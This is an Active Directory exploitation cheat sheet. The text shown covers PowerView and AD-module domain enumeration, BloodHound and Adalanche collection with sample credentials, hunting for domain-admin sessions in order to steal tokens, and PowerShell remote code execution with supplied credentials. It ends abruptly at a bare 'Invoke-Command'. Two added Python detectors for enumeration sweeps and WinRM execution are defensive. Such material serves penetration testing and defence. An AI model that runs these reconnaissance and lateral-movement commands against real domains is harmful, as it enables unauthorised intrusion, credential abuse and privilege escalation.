Active Directory Exploitation Cheat Sheet
This cheat sheet contains common enumeration and attack methods for Windows Active Directory.
This cheat sheet is inspired by the PayloadAllTheThings repo.
Summary
- Active Directory Exploitation Cheat Sheet
- Summary
- Tools
- Domain Enumeration
- Local Privilege Escalation
- Lateral Movement
- Domain Privilege Escalation
- Kerberoast
- ASREPRoast
- Password Spray Attack
- Force Set SPN
- Abusing Shadow Copies
- List and Decrypt Stored Credentials using Mimikatz
- Unconstrained Delegation
- Constrained Delegation
- Resource Based Constrained Delegation
- DNSAdmins Abuse
- Abusing Active Directory-Integrated DNS
- Abusing Backup Operators Group
- Abusing Exchange
- Weaponizing Printer Bug
- Abusing ACLs
- Abusing IPv6 with mitm6
- SID History Abuse
- Exploiting SharePoint
- Zerologon
- PrintNightmare
- Active Directory Certificate Services
- No PAC
- Domain Persistence
- Cross Forest Attacks
Tools
- Powersploit
- PowerUpSQL
- Powermad
- Impacket
- Mimikatz
- Rubeus -> Compiled Version
- BloodHound
- AD Module
- ASREPRoast
- Adalanche
Domain Enumeration
Using PowerView
Powerview v.3.0
Powerview Wiki
- Get Current Domain:
Get-Domain
- Enumerate Other Domains:
Get-Domain -Domain <DomainName>
- Get Domain SID:
Get-DomainSID
- Get Domain Policy:
Get-DomainPolicy
#Will show us the policy configurations of the Domain about system access or kerberos
Get-DomainPolicy | Select-Object -ExpandProperty SystemAccess
Get-DomainPolicy | Select-Object -ExpandProperty KerberosPolicy
- Get Domain Controllers:
Get-DomainController
Get-DomainController -Domain <DomainName>
- Enumerate Domain Users:
#Save all Domain Users to a file
Get-DomainUser | Out-File -FilePath .\DomainUsers.txt
#Will return specific properties of a specific user
Get-DomainUser -Identity [username] -Properties DisplayName, MemberOf | Format-List
#Enumerate users logged on a machine
Get-NetLoggedon -ComputerName <ComputerName>
#Enumerate Session Information for a machine
Get-NetSession -ComputerName <ComputerName>
#Enumerate domain machines of the current/specified domain where specific users are logged into
Find-DomainUserLocation -Domain <DomainName> | Select-Object UserName, SessionFromName
- Enum Domain Computers:
Get-DomainComputer -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName
#Enumerate Live machines
Get-DomainComputer -Ping -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName
- Enum Groups and Group Members:
#Save all Domain Groups to a file:
Get-DomainGroup | Out-File -FilePath .\DomainGroup.txt
#Return members of Specific Group (eg. Domain Admins & Enterprise Admins)
Get-DomainGroup -Identity '<GroupName>' | Select-Object -ExpandProperty Member
Get-DomainGroupMember -Identity '<GroupName>' | Select-Object MemberDistinguishedName
#Enumerate the local groups on the local (or remote) machine. Requires local admin rights on the remote machine
Get-NetLocalGroup | Select-Object GroupName
#Enumerates members of a specific local group on the local (or remote) machine. Also requires local admin rights on the remote machine
Get-NetLocalGroupMember -GroupName Administrators | Select-Object MemberName, IsGroup, IsDomain
#Return all GPOs in a domain that modify local group memberships through Restricted Groups or Group Policy Preferences
Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
- Enumerate Shares:
#Enumerate Domain Shares
Find-DomainShare
#Enumerate Domain Shares the current user has access to
Find-DomainShare -CheckShareAccess
#Enumerate "Interesting" Files on accessible shares
Find-InterestingDomainShareFile -Include *passwords*
- Enum Group Policies:
Get-DomainGPO -Properties DisplayName | Sort-Object -Property DisplayName
#Enumerate all GPOs applied to a specific computer
Get-DomainGPO -ComputerIdentity <ComputerName> -Properties DisplayName | Sort-Object -Property DisplayName
#Get users that are part of a Machine's local Admin group
Get-DomainGPOComputerLocalGroupMapping -ComputerName <ComputerName>
- Enum OUs:
Get-DomainOU -Properties Name | Sort-Object -Property Name
- Enum ACLs:
#Returns the ACLs associated with the specified account
Get-DomainObjectAcl -Identity <AccountName> -ResolveGUIDs
#Search for interesting ACEs
Find-InterestingDomainAcl -ResolveGUIDs
#Check the ACLs associated with a specified path (e.g. smb share)
Get-PathAcl -Path "\\Path\Of\A\Share"
- Enum Domain Trust:
Get-DomainTrust
Get-DomainTrust -Domain <DomainName>
#Enumerate all trusts for the current domain and then enumerate all trusts for each domain it finds
Get-DomainTrustMapping
- Enum Forest Trust:
Get-ForestDomain
Get-ForestDomain -Forest <ForestName>
#Map the Trusts of the Forest
Get-ForestTrust
Get-ForestTrust -Forest <ForestName>
- User Hunting:
#Finds all machines on the current domain where the current user has local admin access
Find-LocalAdminAccess -Verbose
#Find local admins on all machines of the domain
Find-DomainLocalGroupMember -Verbose
#Find computers where a Domain Admin OR a specified user has a session
Find-DomainUserLocation | Select-Object UserName, SessionFromName
#Confirming admin access
Test-AdminAccess
:heavy_exclamation_mark: Priv Esc to Domain Admin with User Hunting:
I have local admin access on a machine -> A Domain Admin has a session on that machine -> I steal his token and impersonate him -> Profit!
Using AD Module
- Get Current Domain:
Get-ADDomain
- Enum Other Domains:
Get-ADDomain -Identity <Domain>
- Get Domain SID:
(Get-ADDomain).DomainSID
- Get Domain Controllers:
Get-ADDomainController
#A specific DC by name
Get-ADDomainController -Identity <DCName>
#Discover a DC of another domain
Get-ADDomainController -Discover -DomainName <DomainName>
- Enumerate Domain Users:
#-Filter and -Identity are separate parameter sets and cannot be combined
Get-ADUser -Filter * -Properties *
Get-ADUser -Identity <user> -Properties *
#Get a specific "string" on a user's attribute
Get-ADUser -Filter 'Description -like "*wtver*"' -Properties Description | select Name, Description
- Enum Domain Computers:
Get-ADComputer -Filter * -Properties *
#Enumerate Domain Groups
Get-ADGroup -Filter *
- Enum Domain Trust:
Get-ADTrust -Filter *
Get-ADTrust -Identity <DomainName>
- Enum Forest Trust:
Get-ADForest
Get-ADForest -Identity <ForestName>
#Domains of Forest Enumeration
(Get-ADForest).Domains
- Enum Local AppLocker Effective Policy:
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Using BloodHound
Remote BloodHound
Python BloodHound Repository or install it with pip3 install bloodhound
bloodhound-python -u <UserName> -p <Password> -ns <Domain Controller's Ip> -d <Domain> -c All
On Site BloodHound
#Using exe ingestor
.\SharpHound.exe --CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --domain <Domain> --domaincontroller <Domain Controller's Ip> --OutputDirectory <PathToFile>
#Using PowerShell module ingestor
. .\SharpHound.ps1
#PowerShell cmdlets take single-dash parameters, not the exe's double-dash flags
Invoke-BloodHound -CollectionMethod All -LdapUsername <UserName> -LdapPassword <Password> -OutputDirectory <PathToFile>
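PowerView's user hunting (Find-DomainUserLocation, Get-NetSession, Find-DomainShare) and SharpHound's session collection both reach every host through the srvsvc pipe on IPC$, which the targets record as Security event 5145 when Detailed File Share auditing is enabled. The following is an added example, not code from this cheat sheet or from any tool it lists: it flags a single source address that does this against many hosts in a short window. The pipe-separated records are a constructed sample of 5145 fields, and the window and host threshold are assumed tuning values.

```python
"""Detect SMB session/share-enumeration sweeps from Security event 5145 records."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of 5145 fields: timestamp|logging host|source address|account|share|relative target
SAMPLE_5145 = r"""
2024-05-01T10:00:01Z|WS01|10.0.0.50|CORP\jdoe|\\*\IPC$|srvsvc
2024-05-01T10:00:02Z|WS02|10.0.0.50|CORP\jdoe|\\*\IPC$|srvsvc
2024-05-01T10:00:03Z|WS03|10.0.0.50|CORP\jdoe|\\*\IPC$|srvsvc
2024-05-01T10:00:04Z|FS01|10.0.0.50|CORP\jdoe|\\*\IPC$|srvsvc
2024-05-01T10:00:05Z|FS02|10.0.0.50|CORP\jdoe|\\*\IPC$|srvsvc
2024-05-01T10:00:06Z|DC01|10.0.0.50|CORP\jdoe|\\*\IPC$|srvsvc
2024-05-01T10:05:00Z|FS01|10.0.0.77|CORP\asmith|\\*\Finance|reports\q1.xlsx
2024-05-01T11:30:00Z|FS01|10.0.0.80|CORP\bob|\\*\IPC$|srvsvc
2024-05-01T14:00:00Z|FS02|10.0.0.80|CORP\bob|\\*\IPC$|srvsvc
"""

def parse_5145(text):
    """Turn the pipe-separated records into dicts with a parsed timestamp."""
    events = []
    for line in text.strip().splitlines():
        ts, host, src, account, share, target = line.split("|")
        events.append({"time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       "host": host, "src": src, "account": account,
                       "share": share, "target": target})
    return events

def find_enumeration_sweeps(events, window=timedelta(minutes=5), min_hosts=5):
    """Return {source address: details} for sources that opened the srvsvc pipe
    (NetSessionEnum / NetShareEnum) on >= min_hosts distinct hosts within `window`."""
    hits = [e for e in events
            if e["share"].upper().endswith("IPC$") and e["target"].lower() == "srvsvc"]
    by_src = defaultdict(list)
    for e in hits:
        by_src[e["src"]].append(e)
    alerts = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["time"])
        lo = 0
        for hi in range(len(evs)):  # sliding window over the time-ordered hits
            while evs[hi]["time"] - evs[lo]["time"] > window:
                lo += 1
            hosts = {e["host"] for e in evs[lo:hi + 1]}
            # keep the widest window seen for this source
            if len(hosts) >= min_hosts and len(hosts) > len(alerts.get(src, {}).get("hosts", [])):
                alerts[src] = {"account": evs[hi]["account"], "hosts": sorted(hosts),
                               "start": evs[lo]["time"], "end": evs[hi]["time"]}
    return alerts
```

On the sample, find_enumeration_sweeps(parse_5145(SAMPLE_5145)) reports only 10.0.0.50, which reached six hosts in six seconds; the two srvsvc hits from 10.0.0.80 are hours apart and stay below the threshold.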
Using Adalanche
Remote Adalanche
# kali linux:
./adalanche collect activedirectory --domain <Domain> \
--username <Username@Domain> --password <Password> \
--server <DC>
# Example:
./adalanche collect activedirectory --domain windcorp.local \
--username spoNge369@windcorp.local --password 'password123!' \
--server dc.windcorp.htb
## -> Terminating successfully
## Any error?:
# LDAP Result Code 200 "Network Error": x509: certificate signed by unknown authority ?
./adalanche collect activedirectory --domain windcorp.local \
--username spoNge369@windcorp.local --password 'password123!' \
--server dc.windcorp.htb --tlsmode NoTLS --port 389
# Invalid Credentials ?
./adalanche collect activedirectory --domain windcorp.local \
--username spoNge369@windcorp.local --password 'password123!' \
--server dc.windcorp.htb --tlsmode NoTLS --port 389 \
--authmode basic
# Analyze data
# go to web browser -> 127.0.0.1:8080
./adalanche analyze
Useful Enumeration Tools
- ldapdomaindump: Information dumper via LDAP
- adidnsdump: Integrated DNS dumping by any authenticated user
- ACLight: Advanced Discovery of Privileged Accounts
- ADRecon: Detailed Active Directory Recon Tool
Local Privilege Escalation
- Windows Local Privilege Escalation Cookbook: Cookbook for Windows Local Privilege Escalations
- Juicy Potato: Abuse SeImpersonate or SeAssignPrimaryToken Privileges for System Impersonation
:warning: Works only until Windows Server 2016 and Windows 10 until patch 1803
- Lovely Potato: Automated Juicy Potato
:warning: Works only until Windows Server 2016 and Windows 10 until patch 1803
- PrintSpoofer: Exploit the PrinterBug for System Impersonation
:pray: Works for Windows Server 2019 and Windows 10
- RoguePotato: Upgraded Juicy Potato
:pray: Works for Windows Server 2019 and Windows 10
Useful Local Priv Esc Tools
- PowerUp: Misconfiguration Abuse
- BeRoot: General Priv Esc Enumeration Tool
- Privesc: General Priv Esc Enumeration Tool
- FullPowers: Restore A Service Account's Privileges
Lateral Movement
PowerShell Remoting
#Enable PowerShell Remoting on current Machine (Needs Admin Access)
Enable-PSRemoting
#Entering or Starting a new PSSession (Needs Admin Access)
$sess = New-PSSession -ComputerName <Name>
Enter-PSSession -ComputerName <Name>
#Or attach to the session object created above (-Session takes the object, not a name)
Enter-PSSession -Session $sess
Remote Code Execution with PS Credentials
$SecPassword = ConvertTo-SecureString '<Wtver>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb.local\<WtverUser>', $SecPassword)
Invoke-Command -ComputerName <WtverMachine> -Credential $Cred -ScriptBlock {whoami}
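Commands sent through Invoke-Command or Enter-PSSession run on the target inside wsmprovhost.exe, so with process creation auditing and command-line logging enabled they appear as Security event 4688 records whose creator process is wsmprovhost.exe. The following is an added example, not code from this cheat sheet: it groups such records by target host and account and rates them against an allow-list of accounts expected to use remoting. The records, the allow-list and the severity rule are constructed assumptions for illustration.

```python
"""Flag commands executed through WinRM sessions using Security event 4688 records."""
from collections import defaultdict

# Constructed sample of 4688 fields: timestamp|host|subject account|new process|creator process|command line
SAMPLE_4688 = r"""
2024-05-01T09:00:00Z|FS01|CORP\svc-backup|C:\Windows\System32\wsmprovhost.exe|C:\Windows\System32\svchost.exe|wsmprovhost.exe -Embedding
2024-05-01T09:00:01Z|FS01|CORP\svc-backup|C:\Windows\System32\whoami.exe|C:\Windows\System32\wsmprovhost.exe|whoami
2024-05-01T09:00:05Z|FS01|CORP\svc-backup|C:\Windows\System32\cmd.exe|C:\Windows\System32\wsmprovhost.exe|cmd.exe /c hostname
2024-05-01T09:30:00Z|WS07|CORP\helpdesk1|C:\Windows\System32\wsmprovhost.exe|C:\Windows\System32\svchost.exe|wsmprovhost.exe -Embedding
2024-05-01T09:30:02Z|WS07|CORP\helpdesk1|C:\Windows\System32\ipconfig.exe|C:\Windows\System32\wsmprovhost.exe|ipconfig /all
2024-05-01T10:00:00Z|FS01|CORP\jdoe|C:\Windows\System32\notepad.exe|C:\Windows\explorer.exe|notepad.exe
"""

def parse_4688(text):
    """Turn the pipe-separated records into dicts (the command line may itself contain '|')."""
    events = []
    for line in text.strip().splitlines():
        ts, host, account, new_proc, creator, cmdline = line.split("|", 5)
        events.append({"time": ts, "host": host, "account": account,
                       "new": new_proc, "creator": creator, "cmdline": cmdline})
    return events

def basename(path):
    """Last component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()

def find_winrm_executions(events, allowed_accounts=frozenset()):
    """Group child processes of wsmprovhost.exe (the WinRM host that runs
    Invoke-Command / Enter-PSSession script blocks) by (host, account).
    Severity is 'high' unless the account is in allowed_accounts, a hypothetical
    allow-list of accounts expected to use remoting (compared lower-case)."""
    sessions = defaultdict(list)
    for e in events:
        if basename(e["creator"]) == "wsmprovhost.exe":
            sessions[(e["host"], e["account"])].append(e["cmdline"])
    return {key: {"commands": cmds,
                  "severity": "info" if key[1].lower() in allowed_accounts else "high"}
            for key, cmds in sessions.items()}
```

With allowed_accounts={r"corp\helpdesk1"}, the helpdesk session on WS07 is rated info while the service account running whoami and cmd.exe on FS01 is rated high; notepad.exe started from explorer.exe is ignored.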
Import a PowerShell Module and Execute its Functions Remotely
#Execute the command and start a session
Invoke-Command